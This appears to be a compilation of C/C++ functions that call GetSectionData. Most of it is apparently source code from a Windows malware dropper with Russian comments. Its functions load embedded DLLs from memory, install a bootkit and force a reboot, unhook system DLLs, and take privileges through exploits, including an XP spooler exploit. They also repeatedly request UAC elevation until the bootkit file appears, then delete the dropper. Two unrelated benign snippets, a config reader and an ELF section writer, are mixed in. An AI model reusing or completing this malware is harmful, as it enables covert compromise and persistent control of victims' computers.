void RunBkDrop() { DWORD loader_dll_body_size = 0; void * loader_dll_body = NULL; PP_DPRINTF(L"RunBkDrop: started."); loader_dll_body = GetSectionData("BKDROPER_PLUG", &loader_dll_body_size); PP_RETURNIF1(loader_dll_body == NULL); PP_RETURNIF1(loader_dll_body_size == 0); PP_DPRINTF(L"RunBkDrop: GetSectionData() result body=%X. size=%d", loader_dll_body, loader_dll_body_size ); HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body); PP_RETURNIF1(loader_dll == NULL); typedef BOOL (WINAPI * BkInstallFunction)(); BkInstallFunction bkinstall = NULL; bkinstall = (BkInstallFunction)MemoryGetProcAddress(loader_dll, "BkInstall"); PP_RETURNIF1(bkinstall == NULL); BOOL bkinstall_result = bkinstall(); PP_DPRINTF(L"RunBkDrop: finished with bkinstall_result=%d.", bkinstall_result); if (bkinstall_result) MultiMethodReboot(); }
BOOL CConfigData::bGetData(void*& lpData, int& nStreamLength, std::string strSectionName) { BOOL bRetVal = FALSE; // is the configuration loaded? // if((m_bConfigInfoLoaded == TRUE) && (bRetVal == TRUE)) { SECTIONDATA tempSecData; tempSecData.m_omSectionName = strSectionName; bRetVal = GetSectionData(m_strCurrProjName, tempSecData.m_omSectionName, tempSecData); if (bRetVal != FALSE) { bRetVal = FALSE; BYTE* pbNewDat = new BYTE[tempSecData.m_nBLOBLen]; if (pbNewDat != nullptr) { memcpy(pbNewDat, tempSecData.m_bBLOB, tempSecData.m_nBLOBLen); nStreamLength = tempSecData.m_nBLOBLen; lpData = (void*) pbNewDat; bRetVal = TRUE; } else { } } } return bRetVal; }
bool CELFFile::WriteSectionData(int section_index,size_t offset,unsigned char * buffer,unsigned long* buffer_size) { bool success = false; size_t section_size; char * section_buffer = reinterpret_cast<char*>(GetSectionData(section_index,§ion_size)); if (offset + *buffer_size <= section_size && section_buffer != NULL) { memcpy(section_buffer + offset,buffer,*buffer_size); success = true; } return success; }
void DownloadPlugByLoaderDll() { DWORD loader_dll_body_size = 0; void * loader_dll_body = NULL; PP_DPRINTF(L"DownloadPlugByLoaderDll: started."); // 120_d загрузка Loader_dll PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("120_d")); loader_dll_body = GetSectionData("LOADER_DLL", &loader_dll_body_size); PP_RETURNIF1(loader_dll_body == NULL); PP_RETURNIF1(loader_dll_body_size == 0); HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body); PP_RETURNIF1(loader_dll == NULL); // 121_d загрузка Loader_dll успешна PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("121_d")); typedef BOOL (WINAPI* LoadPlugToCacheFunction)(DWORD); LoadPlugToCacheFunction load_plug_to_cache = NULL; load_plug_to_cache = (LoadPlugToCacheFunction)MemoryGetProcAddress(loader_dll, "LoadPlugToCache"); PP_RETURNIF1(load_plug_to_cache == NULL); // 122_d начало вызова LoadPlugin PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("122_d")); BOOL load_plug_result = load_plug_to_cache(0); PP_DPRINTF(L"DownloadPlugByLoaderDll: finished with load_plug_result=%d.", load_plug_result); }
// Ф-ция, которая вызывается при инжекте в другие процессы. // Проверяет свои права и пробует их расширить для DWORD WINAPI ExplorerRoutine( LPVOID lpData ) { // // Cоздадим отдельный поток для удаления так как дропер может удаляться больше минуты. // BOOL bRun = TRUE; BOOL bRet = FALSE; BOOL IsUsedExploit = FALSE; OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0}; UnhookDlls(); BuildImport((PVOID)GetImageBase()); PP_DPRINTF(L"ExplorerRoutine: started"); if (! IsUserAdmin() ) { PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges."); switch ( TakePrivileges() ) { case 0: case 2: bRun = FALSE; break; }; PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun); IsUsedExploit = TRUE; // По идее это всегда TRUE }; if ( bRun ) { PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet); } /* Если есть права Админа но мы не юзали сплоеты и инстал не удался, юзаем сплоеты и снова делаем инстал */ if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) ) { PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges"); IsUsedExploit = TRUE; switch ( TakePrivileges() ) { case 0: case 2: bRun = FALSE; break; }; if ( bRun ) { PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet); } }; pGetVersionExA(&OSVer); /* Выкидываем длл на диск и юзаем сплойт спуллера, только XP */ if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5)) { PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit"); DWORD DropSize = 0; PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize); if ( DropImage && DropSize) { PCHAR DropFile = File::GetTempNameA(); File::WriteBufferA(DropFile,DropImage,DropSize); SpoolerBypass(DropFile); STR::Free(DropFile); }; }; /* Запуск много раз копии дропера с прошением повышенных прав. */ if ( bRet == FALSE ) { PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle"); PCHAR tmpexe,dir,file ; PCHAR tmp_manifest; PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX"); if ( NamePrefix ) do { tmpexe = File::GetTempNameA(); tmp_manifest = STR::Alloc(MAX_PATH+1); dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ; file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ; if ( tmp_manifest && dir && file) { STR::Free(tmpexe); tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe"); if ( ! tmpexe ) return 0; m_lstrcpy(tmp_manifest,tmpexe); m_lstrcat(tmp_manifest,".manifest"); }; if ( tmpexe && tmp_manifest ) if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) ) { DWORD dwCode = -1; SHELLEXECUTEINFOA ExecInfo; m_lstrcpy(tmp_manifest,tmpexe); m_lstrcat(tmp_manifest," "); m_lstrcat(tmp_manifest,ARGV_UAC_RUN); ExecInfo.cbSize = sizeof(ExecInfo); ExecInfo.lpFile = tmpexe; ExecInfo.lpParameters = tmp_manifest; ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; for ( int i = 0; i < 10; ++i ) { PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest); if ( pShellExecuteExA(&ExecInfo) == FALSE ) break; pWaitForSingleObject(ExecInfo.hProcess,INFINITE); pGetExitCodeProcess(ExecInfo.hProcess,&dwCode); if ( dwCode == 0 ) { PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest); break; } } }; if ( tmpexe ) STR::Free(tmpexe); if ( tmp_manifest ) STR::Free(tmp_manifest); if ( dir ) STR::Free(dir); if ( file ) STR::Free(file); } while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do, цикл пока не появится Файл буткита if ( NamePrefix ) STR::Free(NamePrefix); }; /* Если инстал был не удачный снова пробуем вдруг повезет*/ if ( bRet == FALSE) { PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet); } /* Удаляем дропер */ PP_DPRINTF(L"ExplorerRoutine: Start to delete droper"); pCloseHandle(StartThread(DeleteDropper,NULL)); if ( dwExplorerSelf ) { PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()"); pExitProcess(0); } return 0; }